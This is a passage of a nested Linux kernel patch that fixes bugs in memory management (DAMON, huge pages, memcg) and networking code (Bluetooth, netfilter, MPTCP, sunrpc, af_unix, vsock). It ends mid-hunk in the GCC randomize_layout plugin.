+diff --git a/mm/damon/lru_sort.c b/mm/damon/lru_sort.c
+index efbc2bda8b9cd..63bdad20dbaf8 100644
+--- a/mm/damon/lru_sort.c
++++ b/mm/damon/lru_sort.c
+@@ -195,9 +195,7 @@ static int damon_lru_sort_apply_parameters(void)
+ 	if (err)
+ 		return err;
+ 
+-	/* aggr_interval / sample_interval is the maximum nr_accesses */
+-	hot_thres = damon_lru_sort_mon_attrs.aggr_interval /
+-		damon_lru_sort_mon_attrs.sample_interval *
++	hot_thres = damon_max_nr_accesses(&damon_lru_sort_mon_attrs) *
+ 		hot_thres_access_freq / 1000;
+ 	scheme = damon_lru_sort_new_hot_scheme(hot_thres);
+ 	if (!scheme)
+diff --git a/mm/damon/ops-common.c b/mm/damon/ops-common.c
+index 13b99975cbc2c..0b75a8d5c7068 100644
+--- a/mm/damon/ops-common.c
++++ b/mm/damon/ops-common.c
+@@ -87,7 +87,6 @@ void damon_pmdp_mkold(pmd_t *pmd, struct vm_area_struct *vma, unsigned long addr
+ int damon_hot_score(struct damon_ctx *c, struct damon_region *r,
+ 			struct damos *s)
+ {
+-	unsigned int max_nr_accesses;
+ 	int freq_subscore;
+ 	unsigned int age_in_sec;
+ 	int age_in_log, age_subscore;
+@@ -95,8 +94,8 @@ int damon_hot_score(struct damon_ctx *c, struct damon_region *r,
+ 	unsigned int age_weight = s->quota.weight_age;
+ 	int hotness;
+ 
+-	max_nr_accesses = c->attrs.aggr_interval / c->attrs.sample_interval;
+-	freq_subscore = r->nr_accesses * DAMON_MAX_SUBSCORE / max_nr_accesses;
++	freq_subscore = r->nr_accesses * DAMON_MAX_SUBSCORE /
++		damon_max_nr_accesses(&c->attrs);
+ 
+ 	age_in_sec = (unsigned long)r->age * c->attrs.aggr_interval / 1000000;
+ 	for (age_in_log = 0; age_in_log < DAMON_MAX_AGE_IN_LOG && age_in_sec;
+diff --git a/mm/damon/sysfs.c b/mm/damon/sysfs.c
+index 07e5f1bdf025f..dbf5e4de97a0f 100644
+--- a/mm/damon/sysfs.c
++++ b/mm/damon/sysfs.c
+@@ -2188,58 +2188,75 @@ destroy_targets_out:
+ 	return err;
+ }
+ 
+-/*
+- * Search a target in a context that corresponds to the sysfs target input.
+- *
+- * Return: pointer to the target if found, NULL if not found, or negative
+- * error code if the search failed.
+- */
+-static struct damon_target *damon_sysfs_existing_target(
+-		struct damon_sysfs_target *sys_target, struct damon_ctx *ctx)
++static int damon_sysfs_update_target_pid(struct damon_target *target, int pid)
+ {
+-	struct pid *pid;
+-	struct damon_target *t;
++	struct pid *pid_new;
+ 
+-	if (!damon_target_has_pid(ctx)) {
+-		/* Up to only one target for paddr could exist */
+-		damon_for_each_target(t, ctx)
+-			return t;
+-		return NULL;
++	pid_new = find_get_pid(pid);
++	if (!pid_new)
++		return -EINVAL;
++
++	if (pid_new == target->pid) {
++		put_pid(pid_new);
++		return 0;
+ 	}
+ 
+-	/* ops.id should be DAMON_OPS_VADDR or DAMON_OPS_FVADDR */
+-	pid = find_get_pid(sys_target->pid);
+-	if (!pid)
+-		return ERR_PTR(-EINVAL);
+-	damon_for_each_target(t, ctx) {
+-		if (t->pid == pid) {
+-			put_pid(pid);
+-			return t;
+-		}
++	put_pid(target->pid);
++	target->pid = pid_new;
++	return 0;
++}
++
++static int damon_sysfs_update_target(struct damon_target *target,
++		struct damon_ctx *ctx,
++		struct damon_sysfs_target *sys_target)
++{
++	int err;
++
++	if (damon_target_has_pid(ctx)) {
++		err = damon_sysfs_update_target_pid(target, sys_target->pid);
++		if (err)
++			return err;
+ 	}
+-	put_pid(pid);
+-	return NULL;
++
++	/*
++	 * Do monitoring target region boundary update only if one or more
++	 * regions are set by the user.  This is for keeping current monitoring
++	 * target results and range easier, especially for dynamic monitoring
++	 * target regions update ops like 'vaddr'.
++	 */
++	if (sys_target->regions->nr)
++		err = damon_sysfs_set_regions(target, sys_target->regions);
++	return err;
+ }
+ 
+ static int damon_sysfs_set_targets(struct damon_ctx *ctx,
+ 		struct damon_sysfs_targets *sysfs_targets)
+ {
+-	int i, err;
++	struct damon_target *t, *next;
++	int i = 0, err;
+ 
+ 	/* Multiple physical address space monitoring targets makes no sense */
+ 	if (ctx->ops.id == DAMON_OPS_PADDR && sysfs_targets->nr > 1)
+ 		return -EINVAL;
+ 
+-	for (i = 0; i < sysfs_targets->nr; i++) {
++	damon_for_each_target_safe(t, next, ctx) {
++		if (i < sysfs_targets->nr) {
++			err = damon_sysfs_update_target(t, ctx,
++					sysfs_targets->targets_arr[i]);
++			if (err)
++				return err;
++		} else {
++			if (damon_target_has_pid(ctx))
++				put_pid(t->pid);
++			damon_destroy_target(t);
++		}
++		i++;
++	}
++
++	for (; i < sysfs_targets->nr; i++) {
+ 		struct damon_sysfs_target *st = sysfs_targets->targets_arr[i];
+-		struct damon_target *t = damon_sysfs_existing_target(st, ctx);
+ 
+-		if (IS_ERR(t))
+-			return PTR_ERR(t);
+-		if (!t)
+-			err = damon_sysfs_add_target(st, ctx);
+-		else
+-			err = damon_sysfs_set_regions(t, st->regions);
++		err = damon_sysfs_add_target(st, ctx);
+ 		if (err)
+ 			return err;
+ 	}
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index b20fef29e5bb5..2753fb54cdf38 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2757,13 +2757,15 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 			int nr = folio_nr_pages(folio);
+ 
+ 			xas_split(&xas, folio, folio_order(folio));
+-			if (folio_test_swapbacked(folio)) {
+-				__lruvec_stat_mod_folio(folio, NR_SHMEM_THPS,
+-							-nr);
+-			} else {
+-				__lruvec_stat_mod_folio(folio, NR_FILE_THPS,
+-							-nr);
+-				filemap_nr_thps_dec(mapping);
++			if (folio_test_pmd_mappable(folio)) {
++				if (folio_test_swapbacked(folio)) {
++					__lruvec_stat_mod_folio(folio,
++							NR_SHMEM_THPS, -nr);
++				} else {
++					__lruvec_stat_mod_folio(folio,
++							NR_FILE_THPS, -nr);
++					filemap_nr_thps_dec(mapping);
++				}
+ 			}
+ 		}
+ 
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index dacbaf4f7b2c4..9da98e3e71cfe 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -2854,7 +2854,8 @@ static void commit_charge(struct folio *folio, struct mem_cgroup *memcg)
+  * Moreover, it should not come from DMA buffer and is not readily
+  * reclaimable. So those GFP bits should be masked off.
+  */
+-#define OBJCGS_CLEAR_MASK	(__GFP_DMA | __GFP_RECLAIMABLE | __GFP_ACCOUNT)
++#define OBJCGS_CLEAR_MASK	(__GFP_DMA | __GFP_RECLAIMABLE | \
++				 __GFP_ACCOUNT | __GFP_NOFAIL)
+ 
+ /*
+  * mod_objcg_mlstate() may be called with irq enabled, so
+diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c
+index fd40f7e9f1763..bd2570b4f9b7b 100644
+--- a/mm/memory_hotplug.c
++++ b/mm/memory_hotplug.c
+@@ -1611,7 +1611,7 @@ static int scan_movable_pages(unsigned long start, unsigned long end,
+ 		 */
+ 		if (HPageMigratable(head))
+ 			goto found;
+-		skip = compound_nr(head) - (page - head);
++		skip = compound_nr(head) - (pfn - page_to_pfn(head));
+ 		pfn += skip - 1;
+ 	}
+ 	return -ENOENT;
+diff --git a/net/9p/client.c b/net/9p/client.c
+index a96e127ca4883..84b93b04d0f06 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1987,7 +1987,7 @@ struct p9_fid *p9_client_xattrwalk(struct p9_fid *file_fid,
+ 		goto error;
+ 	}
+ 	p9_debug(P9_DEBUG_9P,
+-		 ">>> TXATTRWALK file_fid %d, attr_fid %d name %s\n",
++		 ">>> TXATTRWALK file_fid %d, attr_fid %d name '%s'\n",
+ 		 file_fid->fid, attr_fid->fid, attr_name);
+ 
+ 	req = p9_client_rpc(clnt, P9_TXATTRWALK, "dds",
+diff --git a/net/9p/trans_fd.c b/net/9p/trans_fd.c
+index 5a1aecf7fe487..a69422366a235 100644
+--- a/net/9p/trans_fd.c
++++ b/net/9p/trans_fd.c
+@@ -833,14 +833,21 @@ static int p9_fd_open(struct p9_client *client, int rfd, int wfd)
+ 		goto out_free_ts;
+ 	if (!(ts->rd->f_mode & FMODE_READ))
+ 		goto out_put_rd;
+-	/* prevent workers from hanging on IO when fd is a pipe */
+-	ts->rd->f_flags |= O_NONBLOCK;
++	/* Prevent workers from hanging on IO when fd is a pipe.
++	 * It's technically possible for userspace or concurrent mounts to
++	 * modify this flag concurrently, which will likely result in a
++	 * broken filesystem. However, just having bad flags here should
++	 * not crash the kernel or cause any other sort of bug, so mark this
++	 * particular data race as intentional so that tooling (like KCSAN)
++	 * can allow it and detect further problems.
++	 */
++	data_race(ts->rd->f_flags |= O_NONBLOCK);
+ 	ts->wr = fget(wfd);
+ 	if (!ts->wr)
+ 		goto out_put_rd;
+ 	if (!(ts->wr->f_mode & FMODE_WRITE))
+ 		goto out_put_wr;
+-	ts->wr->f_flags |= O_NONBLOCK;
++	data_race(ts->wr->f_flags |= O_NONBLOCK);
+ 
+ 	client->trans = ts;
+ 	client->status = Connected;
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 728be9307f526..55e0ecd88543e 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -168,13 +168,11 @@ static void hci_conn_cleanup(struct hci_conn *conn)
+ 			hdev->notify(hdev, HCI_NOTIFY_CONN_DEL);
+ 	}
+ 
+-	hci_conn_del_sysfs(conn);
+-
+ 	debugfs_remove_recursive(conn->debugfs);
+ 
+-	hci_dev_put(hdev);
++	hci_conn_del_sysfs(conn);
+ 
+-	hci_conn_put(conn);
++	hci_dev_put(hdev);
+ }
+ 
+ static void le_scan_cleanup(struct work_struct *work)
+diff --git a/net/bluetooth/hci_sysfs.c b/net/bluetooth/hci_sysfs.c
+index 08542dfc2dc53..633b82d542728 100644
+--- a/net/bluetooth/hci_sysfs.c
++++ b/net/bluetooth/hci_sysfs.c
+@@ -33,7 +33,7 @@ void hci_conn_init_sysfs(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 
+-	BT_DBG("conn %p", conn);
++	bt_dev_dbg(hdev, "conn %p", conn);
+ 
+ 	conn->dev.type = &bt_link;
+ 	conn->dev.class = bt_class;
+@@ -46,27 +46,30 @@ void hci_conn_add_sysfs(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 
+-	BT_DBG("conn %p", conn);
++	bt_dev_dbg(hdev, "conn %p", conn);
+ 
+ 	if (device_is_registered(&conn->dev))
+ 		return;
+ 
+ 	dev_set_name(&conn->dev, "%s:%d", hdev->name, conn->handle);
+ 
+-	if (device_add(&conn->dev) < 0) {
++	if (device_add(&conn->dev) < 0)
+ 		bt_dev_err(hdev, "failed to register connection device");
+-		return;
+-	}
+-
+-	hci_dev_hold(hdev);
+ }
+ 
+ void hci_conn_del_sysfs(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 
+-	if (!device_is_registered(&conn->dev))
++	bt_dev_dbg(hdev, "conn %p", conn);
++
++	if (!device_is_registered(&conn->dev)) {
++		/* If device_add() has *not* succeeded, use *only* put_device()
++		 * to drop the reference count.
++		 */
++		put_device(&conn->dev);
+ 		return;
++	}
+ 
+ 	while (1) {
+ 		struct device *dev;
+@@ -78,9 +81,7 @@ void hci_conn_del_sysfs(struct hci_conn *conn)
+ 		put_device(dev);
+ 	}
+ 
+-	device_del(&conn->dev);
+-
+-	hci_dev_put(hdev);
++	device_unregister(&conn->dev);
+ }
+ 
+ static void bt_host_release(struct device *dev)
+diff --git a/net/bridge/netfilter/nf_conntrack_bridge.c b/net/bridge/netfilter/nf_conntrack_bridge.c
+index 73242962be5d7..06d94b2c6b5de 100644
+--- a/net/bridge/netfilter/nf_conntrack_bridge.c
++++ b/net/bridge/netfilter/nf_conntrack_bridge.c
+@@ -37,7 +37,7 @@ static int nf_br_ip_fragment(struct net *net, struct sock *sk,
+ 	ktime_t tstamp = skb->tstamp;
+ 	struct ip_frag_state state;
+ 	struct iphdr *iph;
+-	int err;
++	int err = 0;
+ 
+ 	/* for offloaded checksums cleanup checksum before fragmentation */
+ 	if (skb->ip_summed == CHECKSUM_PARTIAL &&
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 0ee2e33bbe5f8..4305e55dbfba4 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -596,7 +596,7 @@ struct dst_entry *__sk_dst_check(struct sock *sk, u32 cookie)
+ 	    INDIRECT_CALL_INET(dst->ops->check, ip6_dst_check, ipv4_dst_check,
+ 			       dst, cookie) == NULL) {
+ 		sk_tx_queue_clear(sk);
+-		sk->sk_dst_pending_confirm = 0;
++		WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 		RCU_INIT_POINTER(sk->sk_dst_cache, NULL);
+ 		dst_release(dst);
+ 		return NULL;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 62d9472ac8bca..f2ed2aed08ab3 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -731,12 +731,12 @@ int __inet_hash(struct sock *sk, struct sock *osk)
+ 		if (err)
+ 			goto unlock;
+ 	}
++	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	if (IS_ENABLED(CONFIG_IPV6) && sk->sk_reuseport &&
+ 		sk->sk_family == AF_INET6)
+ 		__sk_nulls_add_node_tail_rcu(sk, &ilb2->nulls_head);
+ 	else
+ 		__sk_nulls_add_node_rcu(sk, &ilb2->nulls_head);
+-	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+ unlock:
+ 	spin_unlock(&ilb2->lock);
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index cc7ed86fb0a57..5b93d1ed1ed19 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -1319,7 +1319,7 @@ static int __tcp_transmit_skb(struct sock *sk, struct sk_buff *skb,
+ 	skb->destructor = skb_is_tcp_pure_ack(skb) ? __sock_wfree : tcp_wfree;
+ 	refcount_add(skb->truesize, &sk->sk_wmem_alloc);
+ 
+-	skb_set_dst_pending_confirm(skb, sk->sk_dst_pending_confirm);
++	skb_set_dst_pending_confirm(skb, READ_ONCE(sk->sk_dst_pending_confirm));
+ 
+ 	/* Build TCP header and checksum it. */
+ 	th = (struct tcphdr *)skb->data;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index ee9f455bb2d18..2ca442f485132 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -3006,6 +3006,10 @@ static int ieee80211_get_tx_power(struct wiphy *wiphy,
+ 	else
+ 		*dbm = sdata->vif.bss_conf.txpower;
+ 
++	/* INT_MIN indicates no power level was set yet */
++	if (*dbm == INT_MIN)
++		return -EINVAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 5d845fcf3d09e..980050f6b456f 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -1557,8 +1557,9 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ 	struct mptcp_pm_addr_entry *entry;
+ 
+ 	list_for_each_entry(entry, rm_list, list) {
+-		remove_anno_list_by_saddr(msk, &entry->addr);
+-		if (alist.nr < MPTCP_RM_IDS_MAX)
++		if ((remove_anno_list_by_saddr(msk, &entry->addr) ||
++		     lookup_subflow_by_saddr(&msk->conn_list, &entry->addr)) &&
++		    alist.nr < MPTCP_RM_IDS_MAX)
+ 			alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 0eb20274459c8..76539d1004ebb 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1275,6 +1275,8 @@ static void mptcp_update_infinite_map(struct mptcp_sock *msk,
+ 	mptcp_do_fallback(ssk);
+ }
+ 
++#define MPTCP_MAX_GSO_SIZE (GSO_LEGACY_MAX_SIZE - (MAX_TCP_HEADER + 1))
++
+ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 			      struct mptcp_data_frag *dfrag,
+ 			      struct mptcp_sendmsg_info *info)
+@@ -1301,6 +1303,8 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 		return -EAGAIN;
+ 
+ 	/* compute send limit */
++	if (unlikely(ssk->sk_gso_max_size > MPTCP_MAX_GSO_SIZE))
++		ssk->sk_gso_max_size = MPTCP_MAX_GSO_SIZE;
+ 	info->mss_now = tcp_send_mss(ssk, &info->size_goal, info->flags);
+ 	copy = info->size_goal;
+ 
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index 937bd4c556151..30374fd44228f 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -735,8 +735,11 @@ static int mptcp_setsockopt_v4_set_tos(struct mptcp_sock *msk, int optname,
+ 	val = inet_sk(sk)->tos;
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++		bool slow;
+ 
++		slow = lock_sock_fast(ssk);
+ 		__ip_sock_set_tos(ssk, val);
++		unlock_sock_fast(ssk, slow);
+ 	}
+ 	release_sock(sk);
+ 
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index f8854bff286cb..62fb1031763d1 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -89,11 +89,6 @@ static int ncsi_aen_handler_lsc(struct ncsi_dev_priv *ndp,
+ 	if ((had_link == has_link) || chained)
+ 		return 0;
+ 
+-	if (had_link)
+-		netif_carrier_off(ndp->ndev.dev);
+-	else
+-		netif_carrier_on(ndp->ndev.dev);
+-
+ 	if (!ndp->multi_package && !nc->package->multi_channel) {
+ 		if (had_link) {
+ 			ndp->flags |= NCSI_DEV_RESHUFFLE;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index d6d59e36d17a7..421211eba838b 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6194,6 +6194,12 @@ static int nft_setelem_deactivate(const struct net *net,
+ 	return ret;
+ }
+ 
++static void nft_setelem_catchall_destroy(struct nft_set_elem_catchall *catchall)
++{
++	list_del_rcu(&catchall->list);
++	kfree_rcu(catchall, rcu);
++}
++
+ static void nft_setelem_catchall_remove(const struct net *net,
+ 					const struct nft_set *set,
+ 					const struct nft_set_elem *elem)
+@@ -6202,8 +6208,7 @@ static void nft_setelem_catchall_remove(const struct net *net,
+ 
+ 	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+ 		if (catchall->elem == elem->priv) {
+-			list_del_rcu(&catchall->list);
+-			kfree_rcu(catchall, rcu);
++			nft_setelem_catchall_destroy(catchall);
+ 			break;
+ 		}
+ 	}
+@@ -9266,9 +9271,8 @@ void nft_trans_gc_queue_sync_done(struct nft_trans_gc *trans)
+ 	call_rcu(&trans->rcu, nft_trans_gc_trans_free);
+ }
+ 
+-static struct nft_trans_gc *nft_trans_gc_catchall(struct nft_trans_gc *gc,
+-						  unsigned int gc_seq,
+-						  bool sync)
++struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
++						 unsigned int gc_seq)
+ {
+ 	struct nft_set_elem_catchall *catchall;
+ 	const struct nft_set *set = gc->set;
+@@ -9284,11 +9288,7 @@ static struct nft_trans_gc *nft_trans_gc_catchall(struct nft_trans_gc *gc,
+ 
+ 		nft_set_elem_dead(ext);
+ dead_elem:
+-		if (sync)
+-			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+-		else
+-			gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
+-
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
+ 		if (!gc)
+ 			return NULL;
+ 
+@@ -9298,15 +9298,34 @@ dead_elem:
+ 	return gc;
+ }
+ 
+-struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
+-						 unsigned int gc_seq)
+-{
+-	return nft_trans_gc_catchall(gc, gc_seq, false);
+-}
+-
+ struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
+ {
+-	return nft_trans_gc_catchall(gc, 0, true);
++	struct nft_set_elem_catchall *catchall, *next;
++	const struct nft_set *set = gc->set;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++
++	WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net));
++
++	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++
++		if (!nft_set_elem_expired(ext))
++			continue;
++
++		gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL);
++		if (!gc)
++			return NULL;
++
++		memset(&elem, 0, sizeof(elem));
++		elem.priv = catchall->elem;
++
++		nft_setelem_data_deactivate(gc->net, gc->set, &elem);
++		nft_setelem_catchall_destroy(catchall);
++		nft_trans_gc_elem_add(gc, elem.priv);
++	}
++
++	return gc;
+ }
+ 
+ static void nf_tables_module_autoload_cleanup(struct net *net)
+diff --git a/net/netfilter/nft_byteorder.c b/net/netfilter/nft_byteorder.c
+index 2e2eb2cb17bc7..605178133d9eb 100644
+--- a/net/netfilter/nft_byteorder.c
++++ b/net/netfilter/nft_byteorder.c
+@@ -38,13 +38,14 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 
+ 	switch (priv->size) {
+ 	case 8: {
++		u64 *dst64 = (void *)dst;
+ 		u64 src64;
+ 
+ 		switch (priv->op) {
+ 		case NFT_BYTEORDER_NTOH:
+ 			for (i = 0; i < priv->len / 8; i++) {
+ 				src64 = nft_reg_load64(&src[i]);
+-				nft_reg_store64(&dst[i],
++				nft_reg_store64(&dst64[i],
+ 						be64_to_cpu((__force __be64)src64));
+ 			}
+ 			break;
+@@ -52,7 +53,7 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 			for (i = 0; i < priv->len / 8; i++) {
+ 				src64 = (__force __u64)
+ 					cpu_to_be64(nft_reg_load64(&src[i]));
+-				nft_reg_store64(&dst[i], src64);
++				nft_reg_store64(&dst64[i], src64);
+ 			}
+ 			break;
+ 		}
+diff --git a/net/netfilter/nft_meta.c b/net/netfilter/nft_meta.c
+index 55d2d49c34259..6e83321926229 100644
+--- a/net/netfilter/nft_meta.c
++++ b/net/netfilter/nft_meta.c
+@@ -63,7 +63,7 @@ nft_meta_get_eval_time(enum nft_meta_keys key,
+ {
+ 	switch (key) {
+ 	case NFT_META_TIME_NS:
+-		nft_reg_store64(dest, ktime_get_real_ns());
++		nft_reg_store64((u64 *)dest, ktime_get_real_ns());
+ 		break;
+ 	case NFT_META_TIME_DAY:
+ 		nft_reg_store8(dest, nft_meta_weekday());
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 2b803383c7b31..61e5c77462e94 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -111,7 +111,8 @@ static void rpc_clnt_remove_pipedir(struct rpc_clnt *clnt)
+ 
+ 	pipefs_sb = rpc_get_sb_net(net);
+ 	if (pipefs_sb) {
+-		__rpc_clnt_remove_pipedir(clnt);
++		if (pipefs_sb == clnt->pipefs_sb)
++			__rpc_clnt_remove_pipedir(clnt);
+ 		rpc_put_sb_net(net);
+ 	}
+ }
+@@ -151,6 +152,8 @@ rpc_setup_pipedir(struct super_block *pipefs_sb, struct rpc_clnt *clnt)
+ {
+ 	struct dentry *dentry;
+ 
++	clnt->pipefs_sb = pipefs_sb;
++
+ 	if (clnt->cl_program->pipe_dir_name != NULL) {
+ 		dentry = rpc_setup_pipedir_sb(pipefs_sb, clnt);
+ 		if (IS_ERR(dentry))
+@@ -2157,6 +2160,7 @@ call_connect_status(struct rpc_task *task)
+ 	task->tk_status = 0;
+ 	switch (status) {
+ 	case -ECONNREFUSED:
++	case -ECONNRESET:
+ 		/* A positive refusal suggests a rebind is needed. */
+ 		if (RPC_IS_SOFTCONN(task))
+ 			break;
+@@ -2165,7 +2169,6 @@ call_connect_status(struct rpc_task *task)
+ 			goto out_retry;
+ 		}
+ 		fallthrough;
+-	case -ECONNRESET:
+ 	case -ECONNABORTED:
+ 	case -ENETDOWN:
+ 	case -ENETUNREACH:
+diff --git a/net/sunrpc/rpcb_clnt.c b/net/sunrpc/rpcb_clnt.c
+index 5a8e6d46809ae..82afb56695f8d 100644
+--- a/net/sunrpc/rpcb_clnt.c
++++ b/net/sunrpc/rpcb_clnt.c
+@@ -746,6 +746,10 @@ void rpcb_getport_async(struct rpc_task *task)
+ 
+ 	child = rpcb_call_async(rpcb_clnt, map, proc);
+ 	rpc_release_client(rpcb_clnt);
++	if (IS_ERR(child)) {
++		/* rpcb_map_release() has freed the arguments */
++		return;
++	}
+ 
+ 	xprt->stat.bind_count++;
+ 	rpc_put_task(child);
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+index 6da6608985ce9..b2dd01e5274e9 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+@@ -857,7 +857,8 @@ out_readfail:
+ 	if (ret == -EINVAL)
+ 		svc_rdma_send_error(rdma_xprt, ctxt, ret);
+ 	svc_rdma_recv_ctxt_put(rdma_xprt, ctxt);
+-	return ret;
++	svc_xprt_deferred_close(xprt);
++	return -ENOTCONN;
+ 
+ out_backchannel:
+ 	svc_rdma_handle_bc_reply(rqstp, ctxt);
+diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c
+index dfea27a906f2f..9eb7cab6b2f60 100644
+--- a/net/tipc/netlink_compat.c
++++ b/net/tipc/netlink_compat.c
+@@ -101,6 +101,7 @@ static int tipc_add_tlv(struct sk_buff *skb, u16 type, void *data, u16 len)
+ 		return -EMSGSIZE;
+ 
+ 	skb_put(skb, TLV_SPACE(len));
++	memset(tlv, 0, TLV_SPACE(len));
+ 	tlv->tlv_type = htons(type);
+ 	tlv->tlv_len = htons(TLV_LENGTH(len));
+ 	if (len && data)
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 310952f4c68f7..6dbeb80073338 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2641,15 +2641,16 @@ static int unix_stream_recv_urg(struct unix_stream_read_state *state)
+ 
+ 	if (!(state->flags & MSG_PEEK))
+ 		WRITE_ONCE(u->oob_skb, NULL);
+-
++	else
++		skb_get(oob_skb);
+ 	unix_state_unlock(sk);
+ 
+ 	chunk = state->recv_actor(oob_skb, 0, chunk, state);
+ 
+-	if (!(state->flags & MSG_PEEK)) {
++	if (!(state->flags & MSG_PEEK))
+ 		UNIXCB(oob_skb).consumed += 1;
+-		kfree_skb(oob_skb);
+-	}
++
++	consume_skb(oob_skb);
+ 
+ 	mutex_unlock(&u->iolock);
+ 
+diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
+index 8360c790a8a01..84471745c0829 100644
+--- a/net/vmw_vsock/af_vsock.c
++++ b/net/vmw_vsock/af_vsock.c
+@@ -89,6 +89,7 @@
+ #include <linux/types.h>
+ #include <linux/bitops.h>
+ #include <linux/cred.h>
++#include <linux/errqueue.h>
+ #include <linux/init.h>
+ #include <linux/io.h>
+ #include <linux/kernel.h>
+@@ -110,6 +111,7 @@
+ #include <linux/workqueue.h>
+ #include <net/sock.h>
+ #include <net/af_vsock.h>
++#include <uapi/linux/vm_sockets.h>
+ 
+ static int __vsock_bind(struct sock *sk, struct sockaddr_vm *addr);
+ static void vsock_sk_destruct(struct sock *sk);
+@@ -2096,6 +2098,10 @@ vsock_connectible_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	int err;
+ 
+ 	sk = sock->sk;
++
++	if (unlikely(flags & MSG_ERRQUEUE))
++		return sock_recv_errqueue(sk, msg, len, SOL_VSOCK, VSOCK_RECVERR);
++
+ 	vsk = vsock_sk(sk);
+ 	err = 0;
+ 
+diff --git a/scripts/gcc-plugins/randomize_layout_plugin.c b/scripts/gcc-plugins/randomize_layout_plugin.c
+index 951b74ba1b242..366395cab490d 100644
+--- a/scripts/gcc-plugins/randomize_layout_plugin.c
++++ b/scripts/gcc-plugins/randomize_layout_plugin.c
+@@ -191,12 +191,14 @@ static void partition_struct(tree *fields, unsigned long length, struct partitio
+ 
+ static void performance_shuffle(tree *newtree, unsigned long length, ranctx *prng_state)
+ {
+-	unsigned long i, x;
++	unsigned long i, x, index;
+ 	struct partition_group size_group[length];
+ 	unsigned long num_groups = 0;
+ 	unsigned long randnum;
+ 
+ 	partition_struct(newtree, length, (struct partition_group *)&size_group, &num_groups);
++
++	/* FIXME: this group shuffle is currently a no-op. */
+ 	for (i = num_groups - 1; i > 0; i--) {
+ 		struct partition_group tmp;
+ 		randnum = ranval(prng_state) % (i + 1);
+@@ -206,11 +208,14 @@ static void performance_shuffle(tree *newtree, unsigned long length, ranctx *prn
+ 	}
+ 
+ 	for (x = 0; x < num_groups; x++) {
+-		for (i = size_group[x].start + size_group[x].length - 1; i > size_group[x].start; i--) {
